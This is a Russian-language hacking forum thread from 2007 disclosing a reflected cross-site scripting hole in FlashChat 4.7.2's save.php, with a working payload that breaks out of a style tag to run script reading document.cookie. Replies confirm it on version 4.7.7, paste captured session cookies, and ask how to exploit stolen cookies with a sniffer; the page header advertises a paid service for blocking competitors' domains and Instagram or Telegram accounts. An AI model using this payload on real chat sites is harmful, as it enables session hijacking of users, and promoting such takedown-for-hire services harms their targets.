УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
FlashChat v 4.7.2

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

FlashChat v 4.7.2

02.02.2007, 01:10

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

FlashChat v 4.7.2

Пришлось мне потеститьFlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

Цитата:

save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13

По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс

Код:

	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;
}
-->
</style>

Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:

Цитата:

save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--

Теперь иходный код примет такой вид

Код:

	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;}--></style><script>alert(document.cookie)</script><!--
}
-->
</style>

А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте

02.02.2007, 23:08

_Nikolas_

Новичок

Регистрация: 27.12.2006

Сообщений: 18

Провел на форуме:
105228

Репутация: 19

Работает, шаришь).

03.02.2007, 00:59

Connor

Постоянный

Регистрация: 15.11.2006

Сообщений: 349

Провел на форуме:
9019502

Репутация: 1165

Как можно прикрыть ету уязвимость?И существует ли она в других версиях чата?

05.02.2007, 22:49

track

Новичок

Регистрация: 20.06.2006

Сообщений: 13

Провел на форуме:
115582

Репутация: 8

Отправить сообщение для track с помощью ICQ

попробовал на версии 4.7.7

Цитата:

wbb2_cookiehash=05774aa8eb7642934e9bd942be4ccb79;
wbb2_lastvisit=1170701252;
PHPSESSID=dc09253337597b4c7b65d61b7ad7d3f1

походу тож работает

10.02.2007, 19:43

jusuf

Новичок

Регистрация: 16.06.2006

Сообщений: 21

Провел на форуме:
149219

Репутация: 5

a kak panimat vot eta ?

Код:

357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|utmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684.1171122060.2; __utmc=125134932; __utmb=125134932

no chat nawerna ciutka perepisan

13.02.2007, 00:57

Dimon_Aka_Sexxx

Новичок

Регистрация: 22.01.2007

Сообщений: 18

Провел на форуме:
105006

Репутация: 6

+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Последний раз редактировалось Dimon_Aka_Sexxx; 13.02.2007 в 00:59..

02.03.2007, 13:54

Linuxoid

Участник форума

Регистрация: 13.02.2007

Сообщений: 205

Провел на форуме:
928552

Репутация: 55

Отправить сообщение для Linuxoid с помощью ICQ

Цитата:

Сообщение от Dimon_Aka_Sexxx

+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Жжош! Некогда не юзал чтоли подобные уязвимости?
Кури ЭТО.

02.03.2007, 17:55

Витян

Участник форума

Регистрация: 25.12.2006

Сообщений: 220

Провел на форуме:
2544458

Репутация: 243

я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

02.03.2007, 18:00

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Цитата:

Сообщение от Витян

я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

Тебе же дали этот линк
дык читай... =\

#10

08.04.2007, 10:53

Apik

Новичок

Регистрация: 04.04.2007

Сообщений: 4

Провел на форуме:
53239

Репутация: 0

Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Flashchat !!!	karabym	Чаты	17	23.12.2006 04:26
flashchat меняем пароли	Connor	Чаты	1	18.11.2006 01:17
FlashChat v4.7.0	ZikZak	Болталка	3	14.11.2006 05:34

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход